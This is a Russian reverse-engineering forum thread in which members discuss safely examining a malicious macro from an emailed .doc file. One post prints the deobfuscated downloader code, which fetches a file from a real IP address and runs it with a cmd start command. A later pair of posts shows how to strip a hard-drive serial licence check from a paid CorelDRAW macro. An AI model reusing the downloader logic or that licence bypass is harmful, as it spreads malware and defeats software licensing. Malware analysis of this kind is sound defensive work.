Сейчас на форуме: -Sanchez- (+7 невидимых)

 eXeL@B —› Основной форум —› Просмотр макроса / не активируя его
Посл.ответ Сообщение


Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 08 декабря 2015 11:44 · Поправил: Модератор
· Личное сообщение · #1

Пришло по почте говницо в виде .mht архива, с измененным расширением .doc Ворд видит там макросы, и судя по всему это давнлоадер какой то. Как открыть и посмотреть макросы в ворде я знаю, вопрос можно ли сделать это же не активируя их?. Пробовал выдрать содержание, результатом которого получился editdata.mso (ActiveMime object (.MSO)) Но чем его открыть, тоже не понятно.

-----
-=истина где-то рядом=-




Ранг: 92.1 (постоянный), 83thx
Активность: 0.110
Статус: Участник

Создано: 08 декабря 2015 12:46
· Личное сообщение · #2

--> Link <--




Ранг: 150.3 (ветеран), 175thx
Активность: 0.160.07
Статус: Участник

Создано: 08 декабря 2015 12:53 · Поправил: -=AkaBOSS=-
· Личное сообщение · #3

KingSise пишет:
получился editdata.mso (ActiveMime object (.MSO)) Но чем его открыть, тоже не понятно.

https://blog.cyren.com/articles/new-tricks-of-macro-malware.html

cmd> OfficeMalScanner vbaProject.bin info

| Сообщение посчитали полезным: KingSise


Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 08 декабря 2015 12:58 · Поправил: KingSise
· Личное сообщение · #4

-=AkaBOSS=-, толь я твое сообщение не увидел, толи еще что. Спасибо за инфу, это то что нужно.

Один маленький вопрос, в статье говориться что ActiveMime. пожат zlib´ом.

вопрос снимается, не увидел вот это:

The zlib compressed data on ActiveMime part starts with the magic hex number 0x789C (zlib compressed data) upto the end of file. You can use the following simple python code that I wrote that can decode the discussed zlib compressed data on ActiveMime.

-----
-=истина где-то рядом=-





Ранг: 150.3 (ветеран), 175thx
Активность: 0.160.07
Статус: Участник

Создано: 08 декабря 2015 14:18 · Поправил: -=AkaBOSS=-
· Личное сообщение · #5

KingSise

зеленым отмечен размер блока, начиная со следующего байта.
начало сжатых данных отмечено жёлтым - zlib видно невооружённым глазом.

я уже ведь вытащил всё и предоставил в предыдущем посте.
сам скрипт после деобфускации выглядит примерно так:

Code:
  1. Attribute VB_Name = "anal"
  2. Sub k97cae4tYVh()
  3. Set QITBT7cRW = CreateObject("Microsoft.XMLHTTP")
  4. QITBT7cRW.Open "poST", nI87i2H2qKvk.IyF1dapumLpR, False
  5. QITBT7cRW.send
  6. Set rQjVsPVgc = CreateObject("ADODB.Stream")
  7. rQjVsPVgc.Open
  8. rQjVsPVgc.Type = 0 + 0 + 0 + 1
  9. rQjVsPVgc.Write QITBT7cRW.responseBody
  10. rQjVsPVgc.SaveToFile ua9CYqa59c.AkpuisfMELx2, 2
  11. rQjVsPVgc.Close
  12. ua9CYqa59c.qeumCNf8YfVrRc
  13. End Sub


пары ключевых переменных не хватает, куда они пропали - хз.
на форме еще висят две строчки, возможно как-то связаны:
"91.223.88.50"
"cmd /c start %TMP%/suka.exe"




Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 08 декабря 2015 14:30
· Личное сообщение · #6

Мдя, автор с переменными особо не старался ;) Особенно радует karma, anal, suka ☺

Добавлено спустя 1 минуту
-=AkaBOSS=- пишет:
я уже ведь вытащил всё и предоставил в предыдущем посте.


да, я видел, хотел на будущее саму распаковку понять. Что то много последнее время говница такого приходить стало...

-----
-=истина где-то рядом=-




Ранг: 101.0 (ветеран), 344thx
Активность: 1.150
Статус: Участник

Создано: 08 декабря 2015 15:01
· Личное сообщение · #7

От модератора: Забанить тебя что ли на недельку за атачи вирусни на форуме?

| Сообщение посчитали полезным: KingSise


Ранг: 469.0 (мудрец), 100thx
Активность: 0.250
Статус: Участник
[www.AHTeam.org]

Создано: 08 декабря 2015 15:04
· Личное сообщение · #8

int пишет:
за атачи вирусни на форуме?


ну в общем было бы справедливо. Как то подзабыл запаролить и на обменник кинуть.

-----
-=истина где-то рядом=-





Ранг: 324.3 (мудрец), 221thx
Активность: 0.480.37
Статус: Участник

Создано: 08 декабря 2015 22:02
· Личное сообщение · #9

С 2003го офиса же политика безопасности по дефолту не позволит исполнить макрос в doc, xls

-----
IZ.RU




Ранг: 431.7 (мудрец), 389thx
Активность: 0.730.32
Статус: Участник

Создано: 08 декабря 2015 22:05 · Поправил: dosprog
· Личное сообщение · #10

DenCoder пишет:
С 2003го офиса же политика безопасности по дефолту не позволит исполнить макрос в doc, xls


А что толку? - Редактирование макросов всё равно запаролено.





Ранг: 105.6 (ветеран), 69thx
Активность: 0.060
Статус: Участник

Создано: 10 декабря 2015 14:04
· Личное сообщение · #11

Может для кого-то окажется открытием. Я без проблем открывал макросы, заблокированные в мелкомягком офисе, через open-office. Макрос был исправлен на бинарном уровне. Open-office всякий мусор в коде макроса выводил, но прочитать и понять макрос не составило труда. Исправить и сохранить правда не получится.



Ранг: 1.1 (гость)
Активность: 0=0
Статус: Участник

Создано: 23 января 2016 18:54 · Поправил: kapka29
· Личное сообщение · #12

есть макрос для corel, он привязан к железу, думаю что к жёсткому диску. есть какие5 либо варианты сделать этот макрос что бы он ставился на любое железо? программой HENPortable добираюсь до состовляющих этого макроса, изменяю DPB на DPx, вижу коды которые указывают на железо а изменить их или выкинуть ну ваще не получаеться. вот пример того что мне открываеться.
под пункт run program
Public Sub Zapysk()

Dim strComputer As String
Dim objWMIService As Object
Dim k As Double
Dim serial As String
Dim s As String

Dim colDiskDrive As Object, objDiskDrive As Object
strComputer = "."
TB_path = Application.Path

Set myFSO = CreateObject("Scripting.FileSystemObject")
Set Fld = myFSO.GetFolder(TB_path + "GMS\Sborka_T")

Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!" & strComputer & "\root\cimv2")
Set colDiskDrive = objWMIService.execquery("SELECT * FROM Win32_PhysicalMedia ")

For Each objDiskDrive In colDiskDrive
k = k + 1
Debug.Print "Serial Namber HDD:" & objDiskDrive.SerialNumber '????? ? ???? immediate
If k = 1 Then
s = objDiskDrive.SerialNumber
End If
Next

' MsgBox "SerialNumber: " & s & Chr(10)


serial = " здеся я так думаю и прописано железо .номер убрал"

zf = Trim(s)
serial = Trim(serial)

' MsgBox Len(serial) & " " & Len(zf)

Debug.Print "PC_code |" & zf & "| " & "Klient code |" & serial & "| "
Debug.Print InStr(1, zf, serial, vbTextCompare)

If InStr(1, zf, serial, vbTextCompare) = 1 Then
frmFasad.Show
Else

Fld.Delete
Kill TB_path + "GMS\*.gms"

MsgBox "Bye"
Exit Sub

End If

End Sub




Ранг: 150.3 (ветеран), 175thx
Активность: 0.160.07
Статус: Участник

Создано: 23 января 2016 23:50
· Личное сообщение · #13

s = objDiskDrive.SerialNumber - вот тут считанный серийник винта
;serial по ходу это введённый юзером серийник же

;а вот и проверка
If InStr(1, zf, serial, vbTextCompare) = 1 Then
frmFasad.Show
Else
Fld.Delete
Kill TB_path + "GMS\*.gms"
MsgBox "Bye"
Exit Sub
End If

; вместо неё можно просто оставить
frmFasad.Show


 eXeL@B —› Основной форум —› Просмотр макроса / не активируя его
:: Ваш ответ
Жирный  Курсив  Подчеркнутый  Перечеркнутый  {mpf5}  Код  Вставить ссылку 
:s1: :s2: :s3: :s4: :s5: :s6: :s7: :s8: :s9: :s10: :s11: :s12: :s13: :s14: :s15: :s16:


Максимальный размер аттача: 500KB.
Ваш логин: german1505 » Выход » ЛС
   Для печати Для печати